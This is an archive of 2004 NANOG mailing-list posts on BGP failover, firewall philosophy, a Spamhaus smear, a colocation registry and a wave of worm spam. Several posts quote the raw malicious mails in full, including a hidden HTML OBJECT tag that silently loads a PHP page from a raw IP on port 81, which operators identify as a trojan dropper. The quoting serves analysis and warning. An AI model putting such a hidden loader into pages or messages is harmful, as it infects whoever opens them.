ok, it will announce this /30 and bgp ip to upstream and thereafter be able to establish bgp session and send all the routes there, but if router is down, same /30 begins to be announced by route switch which could take over routing. Now my main config problem here is that I need a way to have main router announce something to route switch that would suppress its announcement of this same /30 though ebgp. Additionally I need to find a way to let the individual customer servers (these on separate vlans connected from the router and through the switch, each vlan has one ip on the main router and one on the route-switch vlan) know which is the correct default gateway. In theory I can of course have route-switch always be the default router for those customer machines, but I'd like to avoid this and use router instead. And you have to remember here also that while some customer machines are linux and solaris and can talk ospf and receive default router through that, many servers are windows and I really really would like to avoid using IGP routing protocol on microsoft software. So if possible I'd like to completely avoid using IGP protocol for sending default and try doing it some other way. And suggestions on above two items? Did any of you do anything similar and perhaps documented it somewhere? P.S. My router is 7500. The route switch is currenly 5500 with RSM card, but I maybe upgrading to 6500 switch soon, but would like the setup to work on either one. -- William Leibzon Elan Networks [EMAIL PROTECTED]
Re: Firewall opinions wanted please
On Wed, Mar 17, 2004 at 03:01:50PM -0800, bill said something to the effect of: the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem. a pretty good sound bite. :) Add to that that you don't really know what's safe or unsafe, and that you have some services that are convenient for insiders but don't have adequate, scalable authentication on which you can build an authorization mechanism, and you see why firewalls are useful. Perfect? No, of course not. A good idea? Absolutely. Er... perhaps. Who is configuring the firewall? What are its capabilities? You are. Your network engineer is. The needs of your network and staff dictate the demands and deploy a mechanism suitable enough to satisfy them. This is not a question others can answer for you in the hypothetical. How easy will it be to deploy new services? I, as an enduser, That will depend on the services. If you ask most to stream Kazaa into your cube at work, they'll laugh at you. If you want to route jellybeans-over-IP, you'll likely not be considered. If you're at the helm at the office or at home, then it's as easy as you make it and you can do what you want within the scope of your provider's AUP.. Again...competent security engineer...comes to mind... am abdicating most of my responsibility to or it is being hijacked by one or more network service providers. Ken is right. This is the job of the edge/customer/network administrator, or a 3rd party agent contracted to provide managed security services. Most NSPs do not do this (granular filtering) unless engaged (and paid) directly by the customer. Is that what has your dander up? This is the job/responsibility/whim of the subscriber, for the most part. Firewalls, in general, seem to be a great place for blackhats to focus on. What? No...unprotected systems are the great places for blackhats to focus on. Where are you getting this? I apologize for sounding potentially antagonistic, but I am having a difficult time discerning between devil's advocacy and counterintuition in your opinions regarding secure network praxes. Single points of failure are prime targets for attack, too, by the way. As are unchecked portals and ingress vectors. Eschewing security mechansims (physical, logical, DR, etc) contribute to both. DoS is trivial, Please tell me you did not just go there... Network outage is not trivial. Not ever. One more time...where are you getting your information? That clause is patently incorrect. Please remember virii and node subversion when you head in that direction, as well, as granular security is not just about DoS... the degenerate case is encaps of everything into stuff that passes through the firewall (IP over port 80), and then we've just pushed the problem What kind of firewall are you talking about? Who does this? elsewhere, adding more complexity to the system for little if any improvment in the overall integrity. Sounds like the result is a system that is more fragile. Broken record...from where did you derive this information? And how better do you propose to restrict access to a network than filtering/firewalling or somesuch similar level of access control? Or is it (as you have not yet answered this) your position that a network should remain open and unsecured? Not your service provider's network...but networks in general. What, in no uncertain terms, do you believe belongs keeping watch over your network perimeter? Also, what constitutes acceptable loss and/or outage in your organization? It is entirely possible and I am increasingly hopeful that you and I are simply talking about 2 totally separate things. For the record...the top 2 Achilles' heels to network security are improperly- protected edge devices (i.e., web servers, unpatched desktops, unsecured routers, etc), and protocol-related vulnerabilities (i.e., SNMP, DNS/BIND). Your concern for thwarted network application development leads me to enlist you and yours to fix inherently weak protocols (SMTP, for example) to make networking itself again more robust before I agree to see a security layer as superfluous. And then there are software purveyors to visit. --ra -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. --Steve Bellovin, http://www.research.att.com/~smb --bill (cynic) Noting that the nanog thread of the day has changed, but not n'cessly for the better. :)
Re: Spamhaus Exposed
I believe under USC18 there is a section that clearly states hacking a government computer can get you a maximum of 30 years in federal prison and a $250,000.00 fine Please correct me if that postscription of law has been vacated. -Henry Dan Hollis [EMAIL PROTECTED] wrote: On Wed, 17 Mar 2004, Steve Linford wrote: From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less.federal interest site. thats automatic prison time, isnt it?i suspect the culprit could be prosecuted under PATRIOT, and sent away for quite a _long_ time...-Dan
Tracing packets (was Re: Spamhaus Exposed)
On Wed, 17 Mar 2004, Steve Linford wrote: From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less. Has that actually been confirmed. Any machine associated with the path could have been compromised including systems with transitive trust which may not appear in the e-mail headers. Occam's Razor would say the message most likely did originated where it says it originated. But when I just checked it wasn't listed in any of the major block lists of compromised hosts (spamcop does list it as a spam source), and the Pentagon hasn't confirmed the computer was compromised.
Re: Firewall opinions wanted please
In message [EMAIL PROTECTED], bill writes: the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem. a pretty good sound bite. :) Thanks -- I've been using that line for about 10 years, and I haven't gotten tired of it yet Add to that that you don't really know what's safe or unsafe, and that you have some services that are convenient for insiders but don't have adequate, scalable authentication on which you can build an authorization mechanism, and you see why firewalls are useful. Perfect? No, of course not. A good idea? Absolutely. Er... perhaps. Who is configuring the firewall? What are its capabilities? How easy will it be to deploy new services? I, as an enduser, am abdicating most of my responsibility to or it is being hijacked by one or more network service providers. Ken is right. I don't have time to participate in this thread any more tonight -- tomorrow is the biweekly IESG call, and I still have several documents to review -- but I never said that ISPs should implement firewalls. In fact, in general that's a bad idea. Firewalls are the instantiation of a security policy; I don't want my ISP telling me what my security policy is or should be. To be sure, there is a market for a value-added ISP service that provides assorted types of filtering. But that's the sort of thing that's best done by consenting adults. More later --Steve Bellovin, http://www.research.att.com/~smb
Re: Update on Querying IADB
[EMAIL PROTECTED] [17/03/04 17:34 +]: The codes we use at present include: 127.0.0.1Listed in IADB Hmmm... listed in my /etc/hosts as well. Am I IADB compliant? Am i missing something or isn't this a standard dns block / white list implementation? I don't run a large public dnsbl but I do serve out dnsbl zones for my own use. Should dns{b|w}ls be deployed using LDAP / SOAP now? srs
Re: Spamhaus Exposed
In message [EMAIL PROTECTED], Henry Linneweh writes: --0-1103097329-1079567080=:87987 Content-Type: text/plain; charset=us-ascii I believe under USC18 there is a section that clearly states hacking a governm ent computer can get you a maximum of 30 years in federal prison and a $250,00 0.00 fine Please correct me if that postscription of law has been vacated. I don't think so, but my browser isn't rendering some of the characters correctly at http://www4.law.cornell.edu/uscode/18/1030.html --Steve Bellovin, http://www.research.att.com/~smb
Request response
now what - spam to nanog spoofing susan harris?
Mailed out through an open proxy / hacked machine in some australian museum, with a body that tries to load this html page - http://24.84.218.164:81/641280.php Page is hosted on a shawcable conection (probably another trojaned box) that I can't seem to access, though the host is barely pingable srs Return-Path: [EMAIL PROTECTED] Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) by corpmail.outblaze.com (Postfix) with ESMTP id B199316DD9F; Thu, 18 Mar 2004 02:43:17 + (GMT) Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] Date: Thu, 18 Mar 2004 13:40:35 +1000 To: [EMAIL PROTECTED] Subject: Request response From: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600. X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600. Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: [EMAIL PROTECTED] Precedence: bulk Errors-To: [EMAIL PROTECTED] X-Loop: nanog X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.11; VAE: 6.24.0.7; VDF: 6.24.0.61; host: corpmail.outblaze.com) htmlbody font face=System OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php; /OBJECT/body/html
Re: Request response
Erm, something is definately up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what its trying to deliver exactly. Anyone care to comment? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org Return-path: [EMAIL PROTECTED] Envelope-to: [EMAIL PROTECTED] Delivery-date: Wed, 17 Mar 2004 21:41:31 -0500 Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix) by mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6; Wed, 17 Mar 2004 21:41:30 -0500 Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST) Date: Thu, 18 Mar 2004 13:40:35 +1000 To: [EMAIL PROTECTED] From: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600. X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600. Sender: [EMAIL PROTECTED] Precedence: bulk Errors-To: [EMAIL PROTECTED] X-Loop: nanog X-Scan-Signature: 0642888b67059a54bfdd4dcbc5a4659b X-SA-Exim-Connect-IP: 198.108.1.26 X-SA-Exim-Mail-From: [EMAIL PROTECTED] Subject: Request response Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on everest.sosdg.org X-Spam-Level: *** X-Spam-Status: No, hits=7.0 required=9.0 tests=BAYES_01,DCC_CHECK, FORGED_MUA_OUTLOOK,FORGED_OUTLOOK_TAGS,HTML_MESSAGE,MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,NO_REAL_NAME,WEIRD_PORT autolearn=no version=2.63 X-Spam-Report: * 0.2 NO_REAL_NAME From: does not include a real name * -1.5 BAYES_01 BODY: Bayesian spam probability is 1 to 10% * [score: 0.0600] * 0.1 HTML_MESSAGE BODY: HTML included in message * 0.3 MIME_HTML_ONLY BODY: Message only has text/html MIME parts * 0.1 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL * 1.4 WEIRD_PORT URI: Uses non-standard port number for HTTP * 2.9 DCC_CHECK Listed in DCC (http://rhyolite.com/anti-spam/dcc/) * 1.0 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format * 2.6 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook X-SA-Exim-Version: 4.0 (built Tue, 16 Mar 2004 14:56:42 -0500) X-SA-Exim-Scanned: Yes (on mail.sosdg.org) Status: htmlbody font face=System OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php; /OBJECT/body/html
Personal Co-location Registry
http://www.vix.com/personalcolo/ http://www.vix.com/personalcolo/ http://www.vix.com/personalcolo/ notes: (1) even in germany they call them 19 inch racks, thus setting the clock back several decades. (2) i'm very interested in listing more non-US locations (3) i'm interested in listing more locations, period (4) further additions, or any changes, should be sent in HTML source format (5) what a great community -- i've learned a LOT in the last four days!
Protected message
Re: Personal Co-location Registry
In message [EMAIL PROTECTED], Paul Vixie writes: http://www.vix.com/personalcolo/ http://www.vix.com/personalcolo/ http://www.vix.com/personalcolo/ notes: (1) even in germany they call them 19 inch racks, thus setting the clock back several decades. (2) i'm very interested in listing more non-US locations (3) i'm interested in listing more locations, period (4) further additions, or any changes, should be sent in HTML source format (5) what a great community -- i've learned a LOT in the last four days! Thanks -- an excellent resource. One thing you may want to devote a bit more text to: what are typical provisions for remote hands at these places? In the intro, you allude to that as a problem with home-located machines, but I have no idea what the colo facilities do in such cases. Btw -- in Seoul, I noticed that some TV sets there have their screen size measured in inches. The contamination is spreading... --Steve Bellovin, http://www.research.att.com/~smb
Re: Hi (fwd)
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ... This one supposedely came from 203.18.63.43 (australia powerhous museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis univerisity - slu.edu). Connection refused when I tried to see what's there. -- Forwarded message -- Return-Path: [EMAIL PROTECTED] Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) ... Received: by segue.merit.edu (Postfix) id 3B2ED5DE4F; Wed, 17 Mar 2004 23:04:48 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 0AE2E5DE32 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 23:04:46 -0500 (EST) Date: Thu, 18 Mar 2004 15:04:22 +1000 To: [EMAIL PROTECTED] Subject: Re: Hi From: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] ... htmlbody font face=System OBJECT STYLE=display:none DATA=http://165.134.187.102:81/132847.php; /OBJECT/body/html
Re: Hi (fwd)
In message [EMAIL PROTECTED], william(a t)elan.net writes: Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ... This one supposedely came from 203.18.63.43 (australia powerhous museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis univerisity - slu.edu). Connection refused when I tried to see what's there. No -- I'm pretty sure it's a worm. Of the 20 copies I've received -- in just the last 3 hours -- only three have been via the NANOG list. On the bright side, Spamassassin 2.63's default settings seem to kill this one. In fact, it was only by accident that I even noticed them. --Steve Bellovin, http://www.research.att.com/~smb
Re: Hi (fwd)
william(at)elan.net writes on 3/18/2004 11:03 AM: Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ... Have you, by any chance, heard of bcc? That isn't a bug, that's a feature. -- srs (postmaster|suresh)@outblaze.com // gpg : EDEDEFB9 manager, outblaze.com security and antispam operations
Re: Hi (fwd)
Interesting, it does respond, albiet sporadically.. It contains the usual stuff... a trojan.. It looks like a variant of Psyme.. *sigh* -colin. On 18/03/2004, at 4:33 PM, william(at)elan.net wrote: Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ... This one supposedely came from 203.18.63.43 (australia powerhous museum - phm.gov.au) and advertises page on ip 165.134.187.102 (saint louis univerisity - slu.edu). Connection refused when I tried to see what's there.
Re: Personal Co-location Registry
[EMAIL PROTECTED] (TxRx Lists) writes: One thing you may want to devote a bit more text to: what are typical provisions for remote hands at these places? that's one item. others are serial console access, remote power cycle, whether an appointment/escort is required for on-site visits... i can add a row of checkboxes on every entry, but first i'm interested in further normalizing the bandwidth column. and it's looking like i'll need some kind of unpublished e-mail address for each submitter, since a lot of them only advertise phone numbers and i'll need a way to ask for updates when new columns are added. maybe this has to become a database... yipe! I agree, lack of interactive access to a system prior to a functional OS being loaded always seemed like a potential problem area to me, particularly for something based on common PC architecture. http://www.realweasel.com/ is your friend. (isc has about a dozen of 'em.) The main thing that's always put me off paying for colocation is the threat of attacks against the system, and not so much the integrity of the data (because obviously I wouldn't keep anything important on it) not so obvious. my colo'd boxes have everything i care about, and they copy it between eachother at night by cron entries. my definition of safe is multiple copies on diverse power grids. but more the bandwidth liability. 11 state clearly that they account for every byte to/from the NIC so just one unfortunate packet flood could see me paying a lot more than their reasonable monthly fee... agreed. my preference has been for bandwidth limiting and fixed prices. -- Paul Vixie
Re: Firewall opinions wanted please
No. Quite apart from the fact that you mean authorized, not authenticated, the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem. No. let's imagine, that I have 4 hosts, without ANY security problems in software, and I'd like to provide WEB service. Firewall protects other services from outside access. Without it, you can slogin to me, if you know my password, even if host have not any bugs. (Of course, SecureID, hand scan etc... decreases a need for this.) Second. Not ANY network require FireWall. If network (grandma) do not allow any ACCESS fron Internet (grandma's netword do not allow access because it does not expose any IP device to outside network, using NAT for outgoing connections), it can live withourt any ACl and any firewall attributes - and be as secure as production network with expansive firewall(s). Key word is _ACCESS_. No ACCESS - no FireWall (cut wires). One Way Access - many different devices plays role of firewall (PNAT translator, for example, makes 99.9% of the work). More ACCESS required - mode COMPLICATED firewalls are required. So, key word is not PROTECTION but ACCESS.
Re: Firewall opinions wanted please
And I think you have hit it right on the head...another line of defense. Everything I've ever read about security (network or otherwise) suggests that a layered approach increases effectiveness. I certainly don't trust a firewall appliance as my only security device, so I also do prudent things like disable ports and applications that are not in use on my network and enforce authentication and authorization for access to legitimate services. Unfortunately, it decreases it. If I turn off file sharing on Windows server, I'll increase security but complicate support (in some cases). If I run ids system, I spend time, verifying and approving changes done by maintaineers. And so on. So, it is very important to have a strong FIRST line of defense (inbound firewalls) and last line (host IDS); it allows to bring little more efficiency by keeping convenient (but not very secure) protocols inside your internal network. Else, you end up in full paranoya.
Re: Spamhaus Exposed
On Wed, 17 Mar 2004, Steve Linford wrote: From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less. federal interest site. thats automatic prison time, isnt it? Of course, not - he is not from USA (more likely), the end. Why people believe, that this acts means ANYTHING? In Internet, they (acts) means NOTHING.
RE: Spamhaus Exposed
Dan Hollis said: federal interest site. thats automatic prison time, isnt it? Alexei Roudnev replied: Of course, not - he is not from USA (more likely), the end. Why people believe, that this acts means ANYTHING? In Internet, they (acts) means NOTHING. Unless, of course, she happens to travel to the US at some point. http://www.usdoj.gov/criminal/cybercrime/ivanovSent_NJ.htm http://www.usdoj.gov/criminal/cybercrime/gorshkovSent.htm In the Gorshkov/Ivanov case the Russian FSB formally charged the US FBI with breaking Russian law by hacking in to the gang's Russian computers and gathering evidence. One ruling in the cases said Russian law does not apply to the FBI agents operating in the US. So basically you have both sides claiming that I am the law, and whoever has the body wins. Dave Hart
Re: Request response
Brian Bruns wrote: Erm, something is definately up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what its trying to deliver exactly. Anyone care to comment? SpamAssassin whacked it good - X-Virus-Scanned: by amavisd-new at mailgate.pbp.net X-Spam-Status: Yes, hits=8.0 tagged_above=-999.0 required=5.0 tests=BAYES_01, FORGED_MUA_OUTLOOK, FORGED_OUTLOOK_TAGS, HTML_MESSAGE, MIME_HTML_ONLY, NORMAL_HTTP_TO_IP, NO_REAL_NAME, WEIRD_PORT